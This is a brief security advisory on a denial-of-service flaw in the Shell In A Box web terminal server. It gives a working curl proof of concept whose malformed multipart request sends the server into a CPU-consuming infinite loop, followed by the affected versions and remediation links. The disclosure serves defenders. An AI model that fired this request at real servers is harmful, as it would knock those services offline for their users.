Shell In A Box 2.2.0 Denial Of Service

`Product: Shell In A Box (aka shellinabox, shellinaboxd)  
  
"Shell In A Box implements a web server that can export arbitrary command  
line tools to a web based terminal emulator. This emulator is accessible to  
any JavaScript and CSS enabled web browser and does not require any  
additional browser plugins. "  
Most official-ish site: https://github.com/shellinabox/shellinabox  
  
Vulnerability description:  
  
The multipart/form-data parser function in the built-in webserver of Shell  
In A Box enters an infinite loop in case of malformed request payload, the  
server stops serving new requests and the the process eats up 100% of CPU  
time.  
  
Exploitation:  
  
curl -v --header "Content-type: multipart/form-data;  
boundary=------------------------8d14c0216fd84557" -d "impeachment"  
http://127.0.0.1:4200/s/  
  
  
Affected Shell In A Box versions:  
2.20 and below  
  
Remediation:  
Upgrade to 2.21  
Package available in Debian sid:  
https://packages.debian.org/source/sid/shellinabox  
Patch: https://github.com/shellinabox/shellinabox/pull/446  
  
  
`